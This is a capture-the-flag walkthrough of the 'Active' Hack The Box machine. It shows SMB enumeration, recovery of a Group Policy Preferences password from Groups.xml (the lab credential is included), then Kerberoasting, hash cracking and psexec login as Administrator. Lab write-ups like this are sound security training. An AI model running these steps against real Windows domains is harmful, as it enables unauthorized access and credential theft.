HTB Series - Active

tags: htb active windows walkthrough

We start by scanning the target with nmap to find open ports
nmap -sC -sV -oA active 10.10.10.100

The IPC$ and SYSVOL shares are expected of a domain controller.

Smbmap offers similar results

We note that we only have READ access for the Replication share, so we drill down further into it to look for interesting artifacts.

smbmap -H 10.10.10.100 -r Replication --depth 8 
# depth accomplishes was recursive would have, 8 in this case was an estimate of how deep we would have to go.

The output depicts the presence of the Groups.xml file which is of interest to us so we can download it.

smbmap -H 10.10.10.100 -r Replication --depth 8 -A Groups.xml
# -A acquires the file with the specified pattern

From the downloaded file we identify the credentials as follows:

We decrypt the password as shown:

An alternate way to get this would be to use smbclient

smbclient //10.10.10.100/Replication                                                          
Password for [WORKGROUP\cypher]:                                                                                 
Anonymous login successful                                                                                       
Try "help" to get a list of possible commands.                                                                   
smb: \> recurse ON                                                                                               
smb: \> prompt OFF
smb: \> mget *  

We then use impacket to view the users on the Domain
GetADUsers.py -all -dc-ip 10.10.10.100 active.htb/svc_tgs

We try further enumeration using the given user account as follows:

smbmap -d active.htb- -u svc_tgs -p GPPstillStandingStrong2k18 -H 10.10.10.100
# -d is for domain, -u is for user, -p is for password and -H is for Host

We utilize the credentials gathered as follows:

On a windows box, open up a session as the user

runas /netonly /user:active.htb\svc_tgs cmd

We can use bloodhound to proceed as follows:
Use sharphound on the windows box

Verify the connection is working okay

Turns out we just needed to add the DC as the primary DNS in the ethernet settings.

From Bloodhound we query which accounts are susceptible to kerberoasting

Attempt at Kerberoasting

From the hash acquired, we can look up on example hashcat hashes to find out the cracking mode to use

We can then proceed to attempt to crack the hash with hashcat

We then proceed to use the credentials acquired to login as the Administrator via Psexec
psexec.py domain/User@ip

Own the root flag